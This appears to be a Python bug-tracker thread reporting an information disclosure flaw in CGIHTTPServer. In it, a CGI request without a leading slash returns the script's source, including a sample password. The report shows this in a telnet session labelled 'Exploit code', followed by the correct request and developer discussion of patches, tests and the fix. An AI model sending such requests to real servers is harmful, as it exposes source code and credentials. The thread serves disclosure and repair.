================================================================================
Summary:
================================================================================
An information disclosure flaw exists in standard python CGIHTTPServer
module. 
Bug is confirmed in python 2.5 @ fedora 7 (python-2.5-15.fc7).

================================================================================
Description:
================================================================================
Requesting cgi script (in example test.py) without / in the beginnig of URL 
cause return script content/code instead of script execution.
It could lead to disclose some secret information eg. password.

================================================================================
Exploit code:
================================================================================
Connected to localhost.
Escape character is '^]'.
GET cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 14:55:30 GMT
Content-type: text/plain
Content-Length: 150
Last-Modified: Fri, 07 Mar 2008 14:55:04 GMT

#!/usr/bin/env python

print 'Content-Type: text/html'
print 'Cache-Control: no-cache'
print
print 'Hello'
passwd='secret'
path=/opt/myapp/secretpath
Connection closed by foreign host.

================================================================================
correct request:
================================================================================
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /cgi-bin/test.py HTTP/1.0

HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/2.5
Date: Fri, 07 Mar 2008 15:01:03 GMT
Content-Type: text/html
Cache-Control: no-cache

Hello
Connection closed by foreign host.

================================================================================

I'm attaching a patch that fixes this, it was done for rev 61179 (trunk).

Note that is_cgi method is incorrectly documented, even more now. Only
the first line in its docstring is correct now, before this patch, last
paragraph was correct too.

oops, I was doing some tests in the last patch and left a bug in it. I'm
attaching a new one.

This corrects is_cgi docstring (maybe this should be done in a new
issue?). It also removes a part of it that I believe to not be
necessary, someone correct me if I'm wrong.

Could you please create a test case for this as a patch to
Lib/test/test_httpservers.py?

thanks!

fyi - Your patch does not work on windows as it uses os.path for uri
manipulation.  that means it behaves differently with regards to / and \
based on platform.

I'm making a new one.  I've written a unittest.  should be fixed soon.

Fixed in trunk r71303.

This potentially changes the behavior of CGIHTTPServer (for the better)
so this is probably not appropriate to backport to a release branch
unless someone really considers the security of this to be severe.

If backported, the new module function should be expanded inline to
avoid adding a new (though undocumented) API.

Closing.